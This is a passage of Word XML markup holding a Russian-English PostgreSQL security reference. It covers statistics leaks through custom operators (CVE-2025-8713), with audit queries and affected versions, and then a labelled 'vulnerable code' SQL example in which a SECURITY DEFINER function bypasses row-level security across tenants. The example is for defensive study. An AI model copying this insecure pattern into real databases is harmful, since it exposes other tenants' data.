          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eqsel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neqsel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scalarltsel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для built-in operators) работают с column statistics безопасно, потому что они </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">встроены в server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и не have side-effects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Issue появляется только когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">custom estimator function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет side-effect (logging, network call, error embedding). Это паттерн </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">malicious extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">deliberate exfiltration vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не legitimate use case.</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`pg_operator` audit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 FROM pg_operator WHERE oprcode NOT IN (system functions)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — non-system operators в user-schemas. На clean install user-defined operators редки.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на estimator-functions: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM pg_operator WHERE oprrest &lt;&gt; 0 OR oprjoin &lt;&gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> joined to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для определения source функций.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version check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ≤ 17.5/16.9/...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Application-side audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: queries с unusual operator symbols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custom multi-char operators) — flag для review.</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Уязвимы все ветки до фиксов 14.08.2025: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Major</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Уязвима до</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16.10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15.13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15.14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13.21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13.22</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EOL 14.11.2024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фикса (EOL до этого CVE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 13 объявлен EOL 13.11.2025; для production кластеров на 13.21 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">последний CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который оставляет их уязвимыми навсегда без upgrade.</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3.8.6 pg_stats_ext leak (CVE-2024-4317)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — related, оба касаются statistics leak. Граница: 3.8.6 — view permissions bypass (read через pg_stats_ext view); 3.17.4 — planning-phase custom operator bypass. Cross-ref важен — приложения часто имеют оба уязвимости одновременно.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3.17.1 / 3.17.2 / 3.17.3 / 3.17.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — другие RLS-bypass vectors.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 / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RCE через untrusted languages — alternative path для creating malicious estimator functions.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 — общий контекст CVE 14.08.2025 batch.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REVOKE CREATE FROM PUBLIC на schemas, ограничение CREATE OPERATOR/FUNCTION.</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Project Security Advisory: CVE-2025-8713 (когда опубликован) — https://www.postgresql.org/support/security/CVE-2025-8713/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17.6 Release Notes (Security Fixes) — https://www.postgresql.org/docs/release/17.6/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GBHackers article: «Critical PostgreSQL Flaws» — https://gbhackers.com/critical-postgresql-flaws/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«System Catalog» / pg_statistic, pg_stats — https://www.postgresql.org/docs/current/view-pg-stats.html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«CREATE OPERATOR» — https://www.postgresql.org/docs/current/sql-createoperator.html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«Planner Statistics» — https://www.postgresql.org/docs/current/planner-stats.html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pganalyze blog: «5mins of Postgres E141» (если охватывает 2025 batch) — https://pganalyze.com/blog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R26 (sources/research.md, строки 400–405)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CVE-2024-4317 (R17) — related earlier CVE для pg_stats_ext leakage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17.5 SECURITY DEFINER функции и RLS</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Классический mis-configuration без CVE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY DEFINER функция, owner которой имеет RLS-bypass для целевой таблицы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (по умолчанию — owner таблицы или superuser). Когда low-privileged user вызывает такую функцию, она исполняется под owner-context, и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RLS не применяется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий получает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">полный SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на таблицу, обойдя CREATE POLICY. Это не bug PostgreSQL, это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">documented behavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: RLS bypass для owner существует by design, и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нужно явно включать для blocking этого. Антипаттерн — массово использовать SECURITY DEFINER функции как «view-like accessors» к RLS-таблицам </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без FORCE RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без явного фильтра внутри функции по current_setting</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самый частый source RLS-bypass в production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — намного чаще, чем CVE-based vectors. Любая SECURITY DEFINER функция, читающая RLS-protected таблицу, требует ручного review: применяет ли она policy самостоятельно?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Setup multi-tenant orders с RLS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE app.orders (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    id int PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id int NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    amount numeric,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status text</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ALTER TABLE app.orders ENABLE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 ВНИМАНИЕ: НЕТ FORCE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RLS policy для tenant isolation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE POLICY tenant_isolation ON app.orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('jwt.tenant_id')::int);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Owner таблицы: postgres (superuser) — by default bypass RLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- application_user — обычная application role:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SELECT, INSERT, UPDATE ON app.orders TO application_user;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- АНТИПАТТЕРН: SECURITY DEFINER "helper" для admin reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Owner функции: postgres (superuser) — bypass RLS</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app.get_order_summary(p_status text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS TABLE(total_count bigint, total_amount numeric)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY DEFINER     -- ← исполняется под postgres → RLS bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ВНИМАНИЕ: НЕТ явного фильтра по tenant_id внутри функции</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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RETURN QUERY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT count(*), COALESCE(sum(amount), 0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM app.orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE status = p_status;</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USAGE на функцию выдан всем application-роли:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT EXECUTE ON FUNCTION app.get_order_summary(text) TO application_user;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сценарий: разработчик добавил «удобную» функцию для admin-dashboard, которая возвращает aggregate stats. Функция SECURITY DEFINER потому что «нужно читать все tenants для admin reports». Но GRANT EXECUTE дан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">всем</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (включая application_user, которая обычно изолирована per-tenant) — потому что разработчик «забыл» что её можно вызвать из application-кода обычного tenant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Application-caller:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
